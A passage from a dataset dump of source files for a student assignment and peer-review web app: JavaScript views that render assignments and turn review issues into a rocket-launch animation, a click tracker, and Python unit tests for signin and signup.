"text": "/**Responsible for displaying what the user sees**/\nclass FeedbackView extends View\n{\n\tconstructor(controller)\n\t{\n\t\tsuper();\n\n\t\tthis.title = app.viewManager.VIEW.FEEDBACK;\n\t\tthis.controller = controller;\n\t\tthis.setup();\n\n\t\tthis.spaceShipLives = 3; // How many lives ship has. Each issue takes one live.\n\t}\n\n\tonNotify (model, messageType)\n\t{\n\t\tvar view = this;\n\n\t\t// Update the table of assignments\n\t\tif (messageType === net.messageHandler.types.GET_SUBMISSIONS_SUCCESSFUL)\n\t\t{\n var submissionsTable = document.getElementById(\"student-assignment-feedback-table\");\n\n // remove all data in there.\n var rowCount = submissionsTable.rows.length;\n while (--rowCount) {\n submissionsTable.deleteRow(rowCount);\n }\n\n var assignments = app.assignments.assignments;\n\t\t\tvar submissions = model.submissions;\n\t\t\tvar subIns = [];\n\t\t\tfor (var i = 0; i < submissions.length; i++)\n\t\t\t{\n\t\t\t\t// if he is an owner - then he is the one to see these.\n\t\t\t\tif (submissions[i].userID === app.user.id)\n\t\t\t\t{\n\t\t\t\t\tvar submission = submissions[i];\n\t\t\t\t\tvar currentFeedbacksIDs = [];\n\n\t\t\t\t\tfor (var k = 0;k < submission.feedbacks.length; k++)\n\t\t\t\t\t{\n\t\t\t\t\t\tif (submission.feedbacks[k].iteration_submitted === submission.iteration)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tsubIns.push(i);\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\n\t\t\tvar rowIndex = 0;\n for (var i = 0; i < subIns.length; i++)\n {\n \tif (submissions[subIns[i]].feedbacks.length !== 0)\n \t{\n\t\t\t\t\tvar row = submissionsTable.insertRow(rowIndex + 1);\n\n\t\t\t\t\tvar cell0 = row.insertCell(0);\n\t\t\t\t\tfor (var j = 0; j < assignments.length; j++)\n\t\t\t\t\t{\n\t\t\t\t\t\tif (submissions[subIns[i]].assignmentID === assignments[j].id)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tcell0.innerHTML = assignments[j].name;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\n\t\t\t\t\tcell0.id = \"see-student-assignment-feedback#\" + subIns[i];\n\t\t\t\t\tcell0.addEventListener(\"click\", function ()\n\t\t\t\t\t{\n\t\t\t\t\t\tview.createReviewSelectModal(parseInt(this.id.split(\"#\")[1]), this.innerHTML);\n\t\t\t\t\t});\n\t\t\t\t\trowIndex++;\n\t\t\t\t}\n }\n }\n\t}\n\n\tcreateReviewSelectModal(subIndex, assignmentName)\n\t{\n\t\tvar that = this;\n\n\t\tvar modalBody = app.modalContentManager.getModalContent(\"select-review-student\");\n\t\tvar modalData = app.uiFactory.createModal(\"select-review-student\", assignmentName + \" - Select Feedback to View\", modalBody, false);\n\t\tdocument.body.appendChild(modalData.modal);\n\n\t\tvar modalSpaceGame = app.modalContentManager.getModalContent(\"rocket-game\");\n\t\tvar modalSpaceGameData = app.uiFactory.createModal(\"select-review-student\", \"Rocket Test\", modalSpaceGame, false);\n\t\tdocument.body.appendChild(modalSpaceGameData.modal);\n\n\n\t\tvar submission = app.submissions.submissions[subIndex];\n\n\t\tvar currentFeedbacksIDs = [];\n\t\tfor (var i = 0;i< submission.feedbacks.length; i++)\n\t\t{\n\t\t\tif (submission.feedbacks[i].iteration_submitted === submission.iteration)\n\t\t\t{\n\t\t\t\tvar feedback = submission.feedbacks[i];\n\t\t\t\t// test if there are no feedback from a same user on a same iteration\n\t\t\t\tvar foundUser = false;\n\t\t\t\tfor (var j = 0; j< currentFeedbacksIDs.length; j++)\n\t\t\t\t{\n\t\t\t\t\tif (currentFeedbacksIDs[j].reviewer_id === feedback.reviewer_id && currentFeedbacksIDs[j].iteration_submitted === feedback.iteration_submitted)\n\t\t\t\t\t{\n foundUser = true;\n break;\n }\n\t\t\t\t}\n\t\t\t\tif(foundUser)\n\t\t\t\t{\n\t\t\t\t\tcurrentFeedbacksIDs[j] = i;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tcurrentFeedbacksIDs.push(i);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\n\n\t\tvar reviewDiv = document.getElementById(\"select-review-students-buttons\");\n\n\t\tfor (var i = 0; i < currentFeedbacksIDs.length; i++)\n\t\t{\n\t\t\tvar fbdata = submission.feedbacks[currentFeedbacksIDs[i]];\n\n\t\t\tvar reviewBtn = document.createElement(\"BUTTON\");\n\n\t\t\tif (fbdata.reviewer_role === \"student\")\n\t\t\t{\n\t\t\t\treviewBtn.innerHTML =\"Some Review by \" + fbdata.reviewer_name;\n\t\t\t}\n\n\t\t\telse\n\t\t\t{\n\t\t\t\treviewBtn.innerHTML =\"Review by the Lecturer \" + fbdata.reviewer_name;\n\t\t\t\treviewBtn.style=\"font-weight:bold\"\n\t\t\t}\n\n\n\n\t\t\treviewBtn.id = \"select-review-student-feedback-row#\" + submission.id + \"#\" + fbdata.reviewer_id + \"#\" + currentFeedbacksIDs[i];\n\n\n\t\t\treviewBtn.addEventListener(\"click\", function ()\n\t\t\t{\n\t\t\t\tvar parentNode = modalData.modal.parentNode;\n\t\t\t\tparentNode.removeChild(modalData.modal);\n\n\n\n\t\t\t\tmodalSpaceGameData.modal.style.display = \"block\";\n\n\t\t\t\tapp.submissions.codeViewState = \"Comments\";\n\t\t\t\tapp.submissions.reviewerIDToCodeView = parseInt(this.id.split('#')[2]);\n\t\t\t\tapp.submissions.submissionIDToCodeView = parseInt(this.id.split('#')[1]);\n\t\t\t\tapp.submissions.feedbackIndexToReview = parseInt(this.id.split('#')[3]);\n\n\t\t\t\tvar feedback = submission.feedbacks[app.submissions.feedbackIndexToReview];\n\n\t\t\t\tthat.setupRocketGame(modalSpaceGameData, feedback);\n\n\n\t\t\t});\n\n\t\t\treviewDiv.appendChild(reviewBtn);\n\t\t}\n\n\n\n\t\tmodalData.modal.style.display = \"block\";\n\t}\n\n\n\n\tshow()\n\t{\n\t\tsuper.show();\n\t}\n\n\tsetupRocketGame(gameModalData, feedback)\n\t{\n\t\tvar modalBody = gameModalData.modal;\n\t\tvar closeButtons = gameModalData.closes;\n\n\n\n console.log (\"feedback\", feedback);\n var whoReviewed = feedback.reviewer_role;\n\n\n\t\tvar issues = [];\n\n\t\tvar review = feedback[\"review\"];\n\t\tfor (var filename in review)\n\t\t{\n\t\t\tvar fileReview = review[filename];\n\t\t\tfor (var bitID in fileReview)\n\t\t\t{\n\t\t\t\tif (fileReview[bitID].review_type === \"Issue\")\n\t\t\t\t{\n\t\t\t\t\tvar issue = {};\n\t\t\t\t\tissue.file = filename;\n\t\t\t\t\tissue.review = fileReview[bitID].review;\n\t\t\t\t\tissues.push(issue)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\n\t\t// Determines the fate of the ship.\n\t\tvar shipFate = \"fly off\";\n\t\tif (issues.length >= this.spaceShipLives)\n\t\t{\n\t\t\tshipFate = \"fly and explode\";\n\t\t}\n\n\t\tif (issues.length >= this.spaceShipLives * 2)\n\t\t{\n\t\t\tshipFate = \"explode\";\n\t\t}\n\n\t\t//Do prep here\n\n\t\tthis.startCountdown(shipFate, issues, closeButtons, whoReviewed)\n\n\n\t}\n\n\tstartCountdown(shipFate, issues, closeButtons, whoReviewed)\n\t{\n\t\tvar that = this;\n\t\tvar messageLog = document.getElementById(\"messages-window\");\n\n\t\tvar prestartMessage = document.createElement(\"LABEL\");\n\n\t\tif (whoReviewed === \"student\"){\n\t\t\tprestartMessage.innerHTML = \"The spaceship simulation will start in:\";\n\t\t}\n\n\t\telse\n\t\t{\n\t\t\tprestartMessage.innerHTML = \"The launch of the spaceship will commence in:\";\n\t\t}\n\n\t\tmessageLog.appendChild(prestartMessage);\n\n\t\tvar timeLeft = 10;\n\t\tvar timer = setInterval(function()\n\t\t\t{\n\t\t\t\tvar countMessage = document.createElement(\"LABEL\");\n\t\t\t\tcountMessage.innerHTML = timeLeft;\n\t\t\t\tmessageLog.appendChild( document.createElement(\"BR\"));\n\t\t\t\tmessageLog.appendChild(countMessage);\n\n\n\t\t\t\ttimeLeft--;\n\n\n\t\t\t\tif (timeLeft === 5){\n\t\t\t\t\tapp.audioManager.playSound(\"space-ship-flight.wav\", 1);\n\t\t\t\t}\n\n\n\t\t\t\tif (timeLeft === -1)\n\t\t\t\t{\n\t\t\t\t\tclearInterval(timer);\n\t\t\t\t\tthat.rocketFlight(shipFate,issues, messageLog, closeButtons, whoReviewed)\n }\n\n\t\t\t}, 1000);\n\n\t\t\t// Clicking close buttons should bring to the code view\n\t\t for (var i = 0; i <closeButtons.length;i++){\n\t\t\tcloseButtons[i].addEventListener(\"click\", function ()\n\t\t\t{\n\t\t\t\tapp.viewManager.goToView(app.viewManager.VIEW.CODE_VIEW);\n\t\t\t\tclearInterval(timer);\n\t\t\t});\n }\n\n\n\n\t}\n\n\trocketFlight(shipFate,issues, messageLog, closeButtons, whoReviewed)\n\t{\n\t\tvar that = this;\n\t\tvar rocket = document.getElementById(\"spaceship-span\");\n\t\tvar rocketSprite = document.getElementById(\"rocket-image\");\n\n\n\t\tif (shipFate === \"explode\")\n\t\t{\n\t\t\t//Explode\n\t\t\trocketSprite.src=\"resources/images/explosion.png\";\n\t\t\trocketSprite.classList.remove(\"rocket-image\");\n\t\t\trocketSprite.classList.add(\"explosion-image\");\n\n\t\t\tif(whoReviewed === \"student\")\n\t\t\t{\n\t\t\t\tvar lastmessage = document.createElement(\"LABEL\");\n\t\t\t\tlastmessage.innerHTML = \"Simulation was cancelled due to a severe number of errors.\";\n\t\t\t\tlastmessage.style.color = \"red\";\n\t\t\t\tmessageLog.appendChild(document.createElement(\"BR\"));\n\t\t\t\tmessageLog.appendChild(lastmessage)\n\t\t\t}\n\n\t\t\telse{\n\t\t\t\tvar lastmessage = document.createElement(\"LABEL\");\n\t\t\t\tlastmessage.innerHTML = \"Contact was lost. No signal from the ship. We lost it.\";\n\t\t\t\tlastmessage.style.color = \"red\";\n\t\t\t\tmessageLog.appendChild(document.createElement(\"BR\"));\n\t\t\t\tmessageLog.appendChild(lastmessage)\n\t\t\t}\n\n\t\t}\n\n\t\telse\n\t\t{\n\t\t\trocket.classList.add(\"fly\");\n\t\t\trocketSprite.src=\"resources/images/spaceship-flying.png\";\n\n\t\t\tvar explosionCount = 0;\n\t\t\tvar flyStages = 0;\n\n\t\t\tvar timer = setInterval(function()\n\t\t\t\t{\n\t\t\t\t\tflyStages++;\n\n\t\t\t\t\tif (issues.length > explosionCount)\n\t\t\t\t\t{\n\t\t\t\t\t\tvar issue = issues[explosionCount];\n\t\t\t\t\t\texplosionCount++;\n\n\t\t\t\t\t\tvar message = document.createElement(\"LABEL\");\n\t\t\t\t\t\tmessage.innerHTML = \"Error #\" + explosionCount +\" has occurred in file \" + issue.file;\n\t\t\t\t\t\tmessage.style.color = \"red\";\n\n\n\t\t\t\t\t\tmessageLog.appendChild(document.createElement(\"BR\"));\n\t\t\t\t\t\tmessageLog.appendChild(message);\n\n\t\t\t\t\t\tif (explosionCount < 3)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\trocketSprite.src = \"resources/images/spaceship-damage\"+explosionCount+\".png\";\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\telse\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t//Explode\n\t\t\t\t\t\t\trocketSprite.src=\"resources/images/explosion.png\";\n\n\t\t\t\t\t\t\trocketSprite.classList.add(\"explosion-image\");\n\t\t\t\t\t\t\trocketSprite.classList.remove(\"rocket-image\");\n\n\t\t\t\t\t\t\tif(whoReviewed === \"student\")\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tvar lastmessage = document.createElement(\"LABEL\");\n\t\t\t\t\t\t\t\tlastmessage.innerHTML = \"Simulation has ended with failure.\";\n\t\t\t\t\t\t\t\tlastmessage.style.color = \"red\";\n\t\t\t\t\t\t\t\tmessageLog.appendChild(document.createElement(\"BR\"));\n\t\t\t\t\t\t\t\tmessageLog.appendChild(lastmessage)\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\telse{\n\t\t\t\t\t\t\t\tvar lastmessage = document.createElement(\"LABEL\");\n\t\t\t\t\t\t\t\tlastmessage.innerHTML = \"Contact was lost. No signal from the ship. We lost it.\";\n\t\t\t\t\t\t\t\tlastmessage.style.color = \"red\";\n\t\t\t\t\t\t\t\tmessageLog.appendChild(document.createElement(\"BR\"));\n\t\t\t\t\t\t\t\tmessageLog.appendChild(lastmessage)\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\tif (flyStages === 3){\n\n\t\t\t\t\t\t\trocket.classList.add(\"flyOff\");\n\n\t\t\t\t\t\t\tif(whoReviewed === \"student\")\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tvar lastmessage = document.createElement(\"LABEL\");\n\t\t\t\t\t\t\t\tlastmessage.innerHTML = \"Simulation has ended with success\" ;\n\t\t\t\t\t\t\t\tlastmessage.style.color = \"white\";\n\t\t\t\t\t\t\t\tmessageLog.appendChild(document.createElement(\"BR\"));\n\t\t\t\t\t\t\t\tmessageLog.appendChild(lastmessage)\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\telse\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tvar lastmessage = document.createElement(\"LABEL\");\n\t\t\t\t\t\t\t\tlastmessage.innerHTML = \"Spaceship have passed the atmosphere and successfully goes to an orbit\" ;\n\t\t\t\t\t\t\t\tlastmessage.style.color = \"white\";\n\t\t\t\t\t\t\t\tmessageLog.appendChild(document.createElement(\"BR\"));\n\t\t\t\t\t\t\t\tmessageLog.appendChild(lastmessage)\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\n\n\t\t\t\t\tif (flyStages === 5)\n\t\t\t\t\t{\n\t\t\t\t\t\tcloseButtons[0].click();\n\t\t\t\t\t}\n\n\n\t\t\t\t}, 3000);\n\n\n\n\t\t\t\t// Clicking close buttons should bring to the code view\n\t\t\t for (var i = 0; i <closeButtons.length;i++){\n\t\t\t\tcloseButtons[i].addEventListener(\"click\", function ()\n\t\t\t\t{\n\t\t\t\t\tapp.viewManager.goToView(app.viewManager.VIEW.CODE_VIEW);\n\t\t\t\t\tclearInterval(timer);\n\t\t\t\t});\n\t\t\t}\n\n\n\t\t}\n\n\n\n\n\n\n\n\n\t}\n\n}\n"
},
{
"alpha_fraction": 0.6417797803878784,
"alphanum_fraction": 0.6496983170509338,
"avg_line_length": 24.873170852661133,
"blob_id": "031a94c41b465e7ab9dbffd99f4d7f395e35fcf2",
"content_id": "18c81fbf298db109a4a47e6da96646aed6618429",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 5304,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 205,
"path": "/views/assignments-student/AssignmentsStudentView.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "/**Responsible for displaying what the user sees**/\nclass AssignmentsStudentView extends View\n{\n\tconstructor(controller)\n\t{\n\t\tsuper();\n\n\t\tthis.title = app.viewManager.VIEW.ASSIGNMENTS_STUDENT;\n\t\tthis.controller = controller;\n\t\tthis.setup();\n\n\t\tthis.tickAreas = {}\n\t}\n\n\n\tonNotify (model, messageType)\n\t{\n\t\tvar that = this;\n\n\t\tvar assignmentTable = document.getElementById(\"student-assignments-table\");\n\t\tvar reviewDeadlineTable = document.getElementById(\"student-assignments-review-deadlines-table\");\n\n\t\t// Update the table of assessments\n\t\tif (messageType === net.messageHandler.types.GET_ASSIGNMENTS_SUCCESSFUL ||\n\t\t\tmessageType === net.messageHandler.types.ASSIGNMENT_DELETE_SUCCESSFUL )\n\t\t{\n\t\t\t// remove all data in there.\n\t\t\tvar rowCount = assignmentTable.rows.length;\n\t\t\twhile(--rowCount)\n\t\t\t{\n\t\t\t\tassignmentTable.deleteRow(rowCount);\n\t\t\t}\n\n\n\n\t\t\tvar assignments = model.assignments;\n\n\t\t\tfor (var i = 0; i < assignments.length; i++)\n\t\t\t{\n\t\t\t\tvar status = assignments[i].status;\n\t\t\t\tvar row = 0;\n\t\t\t\tvar dlTime = 0;\n\t\t\t\tvar dlDate = 0;\n\n\t\t\t\tif (status === \"normal\" || status === \"submission_soon\")\n\t\t\t\t{\n\t\t\t\t\trow = assignmentTable.insertRow(assignmentTable.rows.length);\n\t\t\t\t\tdlTime = assignments[i].deadlineTime;\n\t\t\t\t\tdlDate = assignments[i].deadlineDate;\n\t\t\t\t}\n\n\t\t\t\telse{\n\t\t\t\t\tcontinue;\n\t\t\t\t}\n\n\n\t\t\t\tvar cell0 = row.insertCell(0);\n\t\t\t\tvar cell1 = row.insertCell(1);\n\t\t\t\tvar cell2 = row.insertCell(2);\n\t\t\t\tvar cell3 = row.insertCell(3);\n\t\t\t\tvar cell4 = row.insertCell(4);\n\n\t\t\t\tvar img = document.createElement(\"IMG\");\n\t\t\t\timg.src = \"resources/images/upload-button.png\";\n\t\t\t\timg.id = \"upload-assignment-button##\" + assignments[i].id;\n\t\t\t\timg.className = \"picture-button\";\n\t\t\t\timg.addEventListener(\"click\", function()\n\t\t\t\t{\n\t\t\t\t\tvar id = parseInt(this.id.split('##')[1]);\n\t\t\t\t\tthat.controller.createSubmitAssignmentModal(id);\n\t\t\t\t});\n\t\t\t\tcell0.appendChild(img);\n\n\n\t\t\t\tcell1.innerHTML = assignments[i].name;\n\t\t\t\tcell2.innerHTML = dlDate;\n\t\t\t\tcell3.innerHTML = dlTime;\n\n\t\t\t\tcell4.id = \"assignment-submission##\" + assignments[i].id;\n\t\t\t\tthis.tickAreas[assignments[i].id] = cell4;\n\t\t\t}\n\t\t}\n\n\n\t\telse if (messageType === net.messageHandler.types.GET_SUBMISSIONS_SUCCESSFUL ||\n\t\t\t\tmessageType === net.messageHandler.types.SUBMIT_ASSIGNMENT_SUCCESSFUL)\n\t\t{\n\t\t\t// Clean all ticks\n\t\t\tfor(var k in this.tickAreas) {\n\t\t\t\tthis.tickAreas[k].innerHTML = \"\";\n\t\t\t}\n\n\t\t\t// Optimise submissions - we need them as dict of assignment_id linking to a freshest submission_id\n\t\t\tvar organisedSubData = {};\n\t\t\tfor (var i = 0; i < model.submissions.length; i++)\n\t\t\t{\n\t\t\t\tif (model.submissions[i].userID === app.user.id)\n\t\t\t\t{\n\t\t\t\t\torganisedSubData[model.submissions[i].assignmentID] = model.submissions[i];\n\t\t\t\t}\n\t\t\t}\n\n\n\t\t\tfor(var assID in organisedSubData)\n\t\t\t{\n\n \t\t\t\tvar subID = organisedSubData[assID].id;\n\n \t\t\t\tvar cell = this.tickAreas[assID];\n\n \t\t\t\tif(cell !== undefined)\n \t\t\t\t{\n\t\t\t\t\t//Set tick image and button.\n\t\t\t\t\tvar subImg = document.createElement(\"IMG\");\n\t\t\t\t\tsubImg.src = \"resources/images/tick.png\";\n\t\t\t\t\tsubImg.className = \"picture-button\";\n\t\t\t\t\tsubImg.id = \"submission-picture##\" + subID;\n\n\t\t\t\t\tsubImg.addEventListener(\"click\", function()\n\t\t\t\t\t{\n\t\t\t\t\t\tvar id = parseInt(this.id.split('##')[1]);\n\t\t\t\t\t\talert(\"Hi there!\");\n\t\t\t\t\t});\n\n\t\t\t\t\tcell.appendChild(subImg);\n \t\t\t\t}\n\n \t\t\t\t//Lets see if there is a sell with where I can put a version in?\n\t\t\t\tvar cell = document.getElementById(\"assignment-submission-iteration##\" + assID);\n \t\t\t\tif (cell)\n \t\t\t\t{\n \t\t\t\t\tcell.innerHTML = organisedSubData[parseInt(assID)].iteration;\n\t\t\t\t}\n\n\t\t\t}\n\t\t}\n\n\t\t// update review section\n\t\trowCount = reviewDeadlineTable.rows.length;\n\t\twhile(--rowCount)\n\t\t{\n\t\t\treviewDeadlineTable.deleteRow(rowCount);\n\t\t}\n\n\t\tvar assignments = app.assignments.assignments;\n\n\t\tfor (var i = 0; i < assignments.length; i++)\n\t\t{\n\n\t\t\t\tif (assignments[i].status === \"review\" || assignments[i].status === \"review_end_soon\")\n\t\t\t{\n\n\t\t\t\t// Student should not be able to re submit code if he have not submitted it initially.\n\t\t\t\tvar submissions = app.submissions.submissions;\n\t\t\t\tvar submissionPresent = false;\n\t\t\t\tvar submission = {};\n\n\t\t\t\tfor (var j = 0; j < submissions.length; j++)\n\t\t\t\t{\n\t\t\t\t\tif (submissions[j].assignmentID === assignments[i].id)\n\t\t\t\t\t{\n\t\t\t\t\t\tsubmissionPresent = true;\n\t\t\t\t\t\tsubmission = submissions[j];\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tif (submissionPresent === false)\n\t\t\t\t{\n\t\t\t\t\tcontinue;\n\t\t\t\t}\n\n\n\t\t\t\tvar row = reviewDeadlineTable.insertRow(reviewDeadlineTable.rows.length);\n\n\t\t\t\tvar cell0 = row.insertCell(0);\n\t\t\t\tvar cell1 = row.insertCell(1);\n\t\t\t\tvar cell2 = row.insertCell(2);\n\t\t\t\tvar cell3 = row.insertCell(3);\n\t\t\t\tvar cell4 = row.insertCell(4);\n\n\t\t\t\tvar img = document.createElement(\"IMG\");\n\t\t\t\timg.src = \"resources/images/upload-button.png\";\n\t\t\t\timg.id = \"upload-assignment-button##\" + assignments[i].id;\n\t\t\t\timg.className = \"picture-button\";\n\t\t\t\timg.addEventListener(\"click\", function()\n\t\t\t\t{\n\t\t\t\t\tvar id = parseInt(this.id.split('##')[1]);\n\t\t\t\t\tthat.controller.createSubmitAssignmentModal(id);\n\t\t\t\t});\n\t\t\t\tcell0.appendChild(img);\n\n\t\t\t\tcell1.innerHTML = assignments[i].name;\n\t\t\t\tcell2.innerHTML = assignments[i].reviewTillDate;\n\t\t\t\tcell3.innerHTML = assignments[i].reviewTillTime;\n\n\t\t\t\tcell4.id = \"assignment-submission-iteration##\" + assignments[i].id;\n\t\t\t\tcell4.innerHTML = submission.iteration;\n\t\t\t}\n\t\t}\n\t}\n\n\tshow()\n\t{\n\t\tsuper.show();\n\t}\n}\n"
},
{
"alpha_fraction": 0.48698481917381287,
"alphanum_fraction": 0.48915401101112366,
"avg_line_length": 26.939393997192383,
"blob_id": "ed4ddd21ecd9488743398ec681f4537bfacb9209",
"content_id": "eaff22d87651d56145cbb642212ff61d3cf71c69",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 922,
"license_type": "no_license",
"max_line_length": 164,
"num_lines": 33,
"path": "/js/Tracker.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "class Tracker\n{\n constructor(id, date, htmlName, userID)\n {\n this.name = id;\n this.time = date;\n this.type = htmlName;\n this.userID = userID;\n }\n logThis()\n {\n console.log(\"at \" + this.format_date(this.time) + \" User \" + this.userID + \" pressed \" + this.name + \" which is of type \" + this.type);\n }\n logAll(trackArr)\n {\n for (var i = 0; i < trackArr.length; i++)\n {\n console.log(\"at \" + this.format_date(trackArr[i].time) + \" User \" + this.userID + \" pressed \" + trackArr[i].name + \" which is of type \" + trackArr[i].type);\n }\n }\n format_date(d)\n {\n var dformat;\n dformat = [d.getDate(),\n d.getMonth()+1,\n d.getFullYear()].join('/')+' '+\n [d.getHours(),\n d.getMinutes(),\n d.getSeconds(),\n d.getMilliseconds()].join(':');\n return dformat;\n }\n}\n"
},
{
"alpha_fraction": 0.5893223881721497,
"alphanum_fraction": 0.5893223881721497,
"avg_line_length": 19.29166603088379,
"blob_id": "4f6336fceaba35ff46a8d6cb58d925a204a04b8c",
"content_id": "12dcb2dd2cbfffbf601a8beb4c798e9c51f9c36f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 974,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 48,
"path": "/tests/test_signin.py",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "import sys\nsys.path.append('..\\py')\n\nimport unittest\nfrom user_manager import UserManager\n\nclass TestSignin(unittest.TestCase):\n \"\"\"Test for Signin.\"\"\"\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Called before everything. (setup)\"\"\"\n print(\"setUpClass\")\n\n\n\n @classmethod\n def tearDownClass(cls):\n \"\"\"Called after everything.(clean)\"\"\"\n print(\"tearDownClass\")\n\n\n\n def setUp(self):\n \"\"\"Called at the start of every test. (setup)\"\"\"\n print(\"setUp\")\n\n\n\n def tearDown(self):\n \"\"\"Called after every test (clean up).\"\"\"\n print(\"tearDown\")\n\n\n\n def test_singin(self):\n \"\"\".\"\"\"\n print(\"test_singin\")\n #returns enum USER_DOESNT_EXIST, DETAILS_INCORRECT, OK\n result = user_manager.signin(\"jack\",\"password123\")\n self.assertTrue(result)\n\n result = user_manager.signin(\"jack\",\"password123\")\n self.assertTrue(result)\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.5294532775878906,
"alphanum_fraction": 0.5305114388465881,
"avg_line_length": 25.009174346923828,
"blob_id": "49ad602a4f715275a3032b04e268d225a907bc7b",
"content_id": "8ba9464e5458e67bb95852ab98dd71cbefcc2d43",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2835,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 109,
"path": "/tests/test_signinup.py",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "import sys\nsys.path.append('/app/py')\n\nimport unittest\nfrom user_manager import UserManager\n\nclass TestSignin(unittest.TestCase):\n \"\"\"Test for Signin.\"\"\"\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Called before everything. (setup)\"\"\"\n print(\"setUpClass\")\n cls.user_manager = UserManager()\n cls.user = {\n 'name': 'Libor',\n 'surname': 'Zachoval',\n 'email': '[email protected]',\n 'role': 'Admin',\n 'password': 'password'\n }\n\n @classmethod\n def tearDownClass(cls):\n \"\"\"Called after everything.(clean)\"\"\"\n print(\"tearDownClass\")\n cls.user_manager.deleteuser(cls.user)\n\n\n\n def setUp(self):\n \"\"\"Called at the start of every test. (setup)\"\"\"\n print(\"setUp\")\n\n def tearDown(self):\n \"\"\"Called after every test (clean up).\"\"\"\n print(\"tearDown\")\n\n\n def test_a_signup(self):\n \"\"\"Test1 tests for True by adding the exact user into DB.\n ***Test2 tests for False by using right email but wrong fields.\n ***Test3 tests for False by using a made up email.\"\"\"\n print(\"test_signup\")\n\n user = self.user\n self.user_manager.signup(user)\n self.signup(user, True)\n\n user = {\n 'name': 'L',\n 'surname': 'Z',\n 'email': '[email protected]',\n 'role': 'A',\n 'password': 'p'\n }\n\n self.signup(user, False)\n\n user = {\n 'name': 'L',\n 'surname': 'Z',\n 'email': 'madeupemail',\n 'role': 'A',\n 'password': 'p'\n }\n\n self.signup(user, False)\n\n def signup(self, user, expected):\n result = self.user_manager.getuser(user)\n if (result != \"USER_DOESNT_EXIST\"):\n self.checkuser(user, result, expected, list(user.keys()))\n else:\n self.assertTrue(False == expected)\n\n def checkuser(self, user, result, expected, fields):\n testPassed = True\n\n for field in fields:\n if (user[field] != result[field]):\n testPassed = False\n break\n\n self.assertTrue(testPassed == expected)\n\n\n\n def test_b_singin(self):\n \"\"\".\"\"\"\n print(\"test_singin\")\n #returns enum USER_DOESNT_EXIST, DETAILS_INCORRECT, OK\n user = {\"email\":\"jack\", \"password\":\"password123\"}\n self.singin(user, \"USER_DOESNT_EXIST\")\n\n user = {\"email\":\"[email protected]\",\"password\":\"wrongPassword\"}\n self.singin(user, \"DETAILS_INCORRECT\")\n\n user = {\"email\":\"[email protected]\",\"password\":\"password\"}\n self.singin(user, \"signin_successful\")\n\n def singin(self, user, expected):\n result = self.user_manager.signin(user)\n print(result)\n self.assertTrue(result == expected)\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.6547472476959229,
"alphanum_fraction": 0.6559802889823914,
"avg_line_length": 19.794872283935547,
"blob_id": "18a2e931cf9876399ed6c21457e177f51e0b5b0c",
"content_id": "6e44fef14f5c8319a6335e2f2f4325e400f1261d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 811,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 39,
"path": "/js/Model.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "/**Superclass that models extend from**/\nclass Model\n{\n\tconstructor()\n\t{\n\t\tthis.observers=[];\n\t}\n\n\taddObserver (observer, messageType)\n\t{\n\t\tif (!(messageType in this.observers))\n\t\t{\n\t\t\tthis.observers[messageType] = [];\n\t\t}\n\n\t\tthis.observers[messageType].push(observer);\n\t}\n\n\t/**Call this whenever the model changes (in this case the rating of the film)**/\n\tnotify (messageType)\n\t{\n\n\n\t\tif (this.observers[messageType] !== undefined)\n\t\t{\n\t\t\tfor (var i = 0; i < this.observers[messageType].length; i++)\n\t\t\t{\n\t\t\t\tthis.observers[messageType][i].onNotify(this, messageType);\n\t\t\t}\n\t\t}\n\n\t\t/*else\n\t\t{\n\t\t\tconsole.log(\"Trying to notify a view that doesn't exist. \" +\n\t\t\t\t\"Check that the correct model is assigned the right observer in App.js\");\n\t\t\tconsole.log(\"If all works as intended - ignore the message\");\n\t\t}*/\n\t}\n}\n"
},
{
"alpha_fraction": 0.6476733088493347,
"alphanum_fraction": 0.6571699976921082,
"avg_line_length": 17.803571701049805,
"blob_id": "644d7080d06b4892322b30afae9b6f93f1e58bab",
"content_id": "3c92e1a31dd059bdd1a0da936232157870488af4",
"detected_licenses": [],
"is_generated": false,
